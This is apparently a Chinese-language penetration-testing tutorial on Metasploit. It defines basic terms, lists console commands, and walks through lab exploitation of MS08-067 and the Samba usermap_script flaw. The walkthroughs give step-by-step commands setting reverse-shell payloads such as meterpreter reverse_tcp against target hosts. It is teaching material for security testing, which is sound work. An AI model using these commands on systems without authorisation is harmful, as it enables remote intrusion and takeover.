Metasploit 並不僅僅是一個工具軟件,它是爲自動化實施經典的、常規的,或複雜新穎的攻擊提供基礎設施支持的一個完整框架平臺。
Metasploit 中提供了滲透攻擊模塊、攻擊載荷和編碼器來輕易實施一次滲透攻擊,也可以更近一步編寫執行更爲複雜的攻擊技術。
專業術語
-
滲透攻擊(Exploit)
滲透攻擊是指有攻擊者或滲透測試者利用一個系統、應用或服務中的安全漏洞,所進行的攻擊行爲。 -
攻擊載荷(Payload)
攻擊載荷就是我們期望目標系統在本滲透攻擊之後去執行的代碼,在Metasploit 框架中可以自由地選擇、傳送和植入。 -
Shellcode
Shellcode 是指在滲透攻擊時作爲攻擊載荷運行的一組機器指令。 -
模塊(Module)
一個模塊是指Metasploit 框架中所使用的一段軟件代碼組件。 -
監聽器(Listener)
監聽器是Metasploit 中用來等待連入網絡連接的組件。
目錄
啓動MSF
- 命令行
# msfconsole - 圖形界面
# armitage
msf > show exploits
這個命令會顯示Metasploit 框架中所有可用的攻擊模塊。
msf > show auxiliary
這個命令會顯示所有輔助模塊以及它們的用途。
msf >search xxx
搜索某個模塊
use xxx
使用某個模塊
msf > show payloads
顯示出payloads
msf > show options
參數是保證Metasploit 框架中各個模塊正確運行所需的各種設置
msf > show targets
Metasploit 的滲透攻擊模塊通常可以列出受到漏洞影響目標系統的類型。舉例來說,針對MS08_067漏洞的攻擊依賴於硬編碼的內存地址,所以這個攻擊僅針對特定的操作系統版本,且只適用於特定的補丁級別、語言版本以及安全機制實現。
info
顯示本模塊的詳細信息。
目錄
MS08_067 的利用
環境說明
@ 攻擊機
Kali
@ 靶機
172.18.11.28
相關命令
# nmap -sT -A --script=smb-vuln-ms08-067.nse -P0 10.10.10.130
# msfconsole 啓動metasploit
msf > search ms08-067(是中橫線,不是下劃線)
msf > use exploit/windows/smb/ms08_067_netapi
msf > set payload windows/meterpreter/reverse_tcp (任選其一)
msf > set payload generic/shell_reverse_tcp (任選其一)
msf > show targets
msf > set target 7(選擇window XP SP3)
msf > show options
msf > set RHOST 目標IP
msf > set LHOST 本機IP
msf > set LPORT 本機端口未被佔用
msf > exploit
遠程溢出Samba
環境說明
@ 攻擊機
Kali
@ 靶機
10.10.10.254
相關命令
msf > use exploit/multi/samba/usermap_script
msf > show options
msf > set RHOST 目標地址
msf > exploit